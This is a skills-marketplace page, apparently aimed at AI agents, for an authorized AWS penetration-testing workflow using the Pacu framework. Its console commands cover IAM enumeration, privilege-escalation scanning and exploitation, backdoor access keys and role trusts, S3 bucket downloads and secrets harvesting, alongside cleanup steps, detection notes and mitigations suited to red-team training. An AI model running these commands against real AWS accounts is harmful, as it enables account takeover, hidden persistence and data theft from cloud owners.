Login
Download
Skills Development AWS Exploitation with Pacu Framework

AWS Exploitation with Pacu Framework

v20260622
exploiting-aws-with-pacu
Pacu is an open-source, modular AWS exploitation framework designed for authorized cloud penetration testing and red-teaming. It functions as a cloud-pentest analogue to Metasploit, enabling users to enumerate AWS resources, scan for privilege escalation paths, and automate the exploitation of IAM vulnerabilities, persistence mechanisms, and data exfiltration. Use this skill to assess the blast radius of compromised credentials in a controlled, authorized environment.
pacu aws cloud-pentest privilege-escalation persistence red-team offensive-security
Get Skill
322 downloads
Overview

Exploiting AWS with Pacu

Legal Notice: This skill is for authorized penetration testing and educational purposes only. Pacu performs active enumeration, privilege escalation, persistence, and backdooring against live AWS accounts. Run it ONLY against accounts you own or have explicit written authorization (scope/Rules of Engagement) to test. Many modules create durable changes (new IAM users, access keys, policies); track and remove everything. Unauthorized use is illegal under the CFAA and equivalent laws.

Overview

Pacu is the open-source AWS exploitation framework from Rhino Security Labs. It is the cloud-pentest analogue of Metasploit: a modular Python console that manages target sessions, enumerates an AWS account, identifies privilege-escalation paths, and executes persistence/backdooring/exfiltration modules — all backed by a local SQLite database that records every enumerated resource so modules can chain off one another's findings.

A Pacu engagement follows a consistent arc. You create a named session, load AWS keys (with set_keys or by importing from ~/.aws/credentials), confirm the identity with whoami, then enumerate IAM and the rest of the account. The flagship workflow is iam__enum_permissions followed by iam__privesc_scan, which checks the compromised principal against ~20 known AWS IAM privilege-escalation primitives (e.g. iam:CreatePolicyVersion, iam:AttachUserPolicy, iam:PassRole + lambda:CreateFunction, sts:AssumeRole) and can auto-exploit them. Persistence modules such as iam__backdoor_users_keys mint a second access key on an existing user, and iam__backdoor_assume_role adds a trust to a role so the attacker can assume it later.

This skill covers installing Pacu, session and credential management, IAM enumeration, automated privilege-escalation scanning and exploitation, persistence/backdooring, and data access — every command and module name verified against the Rhino Security Labs project. Source: github.com/RhinoSecurityLabs/pacu.

When to Use

  • Conducting an authorized AWS cloud penetration test or red-team engagement
  • Assessing the blast radius of a single compromised IAM credential (privesc scanning)
  • Demonstrating persistence/backdoor techniques to drive remediation
  • Generating realistic attacker telemetry to test cloud detections (purple team)
  • Mapping an unfamiliar AWS account's IAM, EC2, S3, and Lambda exposure

Prerequisites

  • Pacu installed: 
    python3 -m pip install -U pip
python3 -m pip install -U pacu     # then run: pacu
# or, preferred on Kali, with pipx:
pipx install git+https://github.com/RhinoSecurityLabs/pacu.git
# or Docker:
docker run -it rhinosecuritylabs/pacu:latest
  • AWS access key/secret (and optional session token) for the in-scope target principal
  • A signed authorization / Rules of Engagement document defining scope
  • Python 3.9+ and outbound HTTPS to AWS API endpoints
  • AWS CLI installed for verification (aws sts get-caller-identity)

Objectives

  • Install Pacu and create an isolated engagement session
  • Load and validate target AWS credentials
  • Enumerate IAM permissions for the compromised principal
  • Identify and (where authorized) exploit privilege-escalation paths
  • Establish persistence via backdoor access keys and role trusts
  • Enumerate and access data in EC2, S3, and Secrets Manager
  • Export findings for reporting and ensure all artifacts are removed

MITRE ATT&CK Mapping

ID Name Use in this skill
T1078.004 Valid Accounts: Cloud Accounts Pacu operates as a valid AWS principal and abuses its permissions
T1098.001 Account Manipulation: Additional Cloud Credentials iam__backdoor_users_keys mints a second access key
T1098.003 Account Manipulation: Additional Cloud Roles iam__backdoor_assume_role / privesc via role policy changes
T1580 Cloud Infrastructure Discovery ec2__enum, iam__enum_users_roles_policies_groups
T1530 Data from Cloud Storage s3__download_bucket retrieves S3 objects
T1552.005 Unsecured Credentials: Cloud Instance Metadata API EC2 IMDS credential abuse

Workflow

1. Launch Pacu and create a session

pacu
# In the Pacu console:
Pacu> set_keys
#   key alias  : engagement-target
#   access key : AKIA...
#   secret key : ...
#   session tok: (optional)

2. Confirm the identity you are operating as

Pacu> whoami
Pacu> run aws sts get-caller-identity     # or, outside Pacu: aws sts get-caller-identity

3. Enumerate IAM entities and the compromised principal's permissions

Pacu> run iam__enum_users_roles_policies_groups
Pacu> run iam__enum_permissions
Pacu> data IAM            # review what was collected into the session DB

4. Scan for privilege-escalation paths

iam__privesc_scan checks the principal against known AWS privesc primitives and lists viable methods.

Pacu> run iam__privesc_scan
# To attempt automated exploitation of a discovered method:
Pacu> run iam__privesc_scan --offline      # analyze without making changes

5. Establish persistence with a backdoor access key

Pacu> run iam__backdoor_users_keys --usernames target-user
# Add an assumable-role trust for long-term access:
Pacu> run iam__backdoor_assume_role --role-names target-role --user-arns arn:aws:iam::111122223333:user/attacker

6. Enumerate compute and storage

Pacu> run ec2__enum
Pacu> run s3__download_bucket --names target-bucket
Pacu> data S3

7. Harvest secrets

Pacu> run secrets__enum

8. Non-interactive execution (CI / scripted)

Pacu supports one-shot module execution from the shell.

pacu --session engagement --module-name iam__enum_users_roles_policies_groups --exec
pacu --session engagement --module-name s3__download_bucket \
     --module-args "--names target-bucket" --exec

9. Export findings and clean up

Pacu> data all > /dev/stdout         # review collected data
# Manually remove every backdoor created (record ARNs/key IDs first):

aws iam delete-access-key --user-name target-user --access-key-id AKIA_BACKDOOR
aws iam update-assume-role-policy --role-name target-role --policy-document file://original-trust.json

See scripts/agent.py to drive the enumerate->privesc flow non-interactively.

Tools and Resources

Resource Purpose Link
Pacu GitHub Source, modules, wiki https://github.com/RhinoSecurityLabs/pacu
Pacu module list Per-module documentation https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details
Rhino AWS privesc research The privesc primitives iam__privesc_scan checks https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
AWS IAM docs Permission and policy reference https://docs.aws.amazon.com/IAM/latest/UserGuide/
CloudGoat Vulnerable AWS lab to practice safely https://github.com/RhinoSecurityLabs/cloudgoat

OPSEC and Detection Considerations

Pacu modules are noisy and durable; an operator must plan for both detection and cleanup:

  • iam__enum_permissions and iam__enum_users_roles_policies_groups generate a large burst of iam:List*/iam:Get* calls visible in CloudTrail and GuardDuty (Discovery:IAMUser/AnomalousBehavior).
  • iam__privesc_scan in non-offline mode can make state-changing calls (iam:CreatePolicyVersion, iam:AttachUserPolicy); use --offline for analysis only.
  • iam__backdoor_users_keys triggers iam:CreateAccessKey, and iam__backdoor_assume_role triggers iam:UpdateAssumeRolePolicy — both are high-signal persistence indicators that defenders alert on.
  • Record every artifact ID (access keys, policy versions, role-trust changes) so each can be reverted; orphaned backdoors are both an OPSEC failure and a real risk to the client.

Defensive Mitigations to Recommend

Finding Remediation
Over-permissive IAM principal (privesc path) Apply least privilege; scope iam:PassRole with conditions
iam:CreatePolicyVersion / SetDefaultPolicyVersion allowed Remove from non-admin roles
Long-lived access keys Enforce key rotation; prefer roles / short-lived STS creds
No detection on key creation Alert on CreateAccessKey / UpdateAssumeRolePolicy in CloudTrail

Key Module Reference

Module Purpose
iam__enum_users_roles_policies_groups Enumerate all IAM principals and policies
iam__enum_permissions Resolve the current principal's effective permissions
iam__privesc_scan Identify (and optionally exploit) privesc paths
iam__backdoor_users_keys Create a backdoor access key on a user
iam__backdoor_assume_role Add an attacker-controlled trust to a role
ec2__enum Enumerate EC2 instances, volumes, snapshots
s3__download_bucket Download objects from an S3 bucket
secrets__enum Enumerate Secrets Manager / SSM parameters

Validation Criteria

  • Pacu installed and console launches
  • Engagement session created and keys loaded
  • Identity confirmed with whoami / sts get-caller-identity
  • IAM entities and current-principal permissions enumerated
  • iam__privesc_scan run and viable paths documented
  • Persistence module behavior demonstrated (in authorized scope)
  • EC2/S3/secrets enumeration completed
  • All created backdoors (keys, role trusts, policies) recorded and removed
  • Findings exported for the engagement report
  • No residual attacker artifacts remain in the account
Info
Category Development
Name exploiting-aws-with-pacu
Version v20260622
Size 12.05KB
Source mukul975/Anthropic-Cybersecurity-Skills
Updated At 2026-06-26
Language
简体中文
English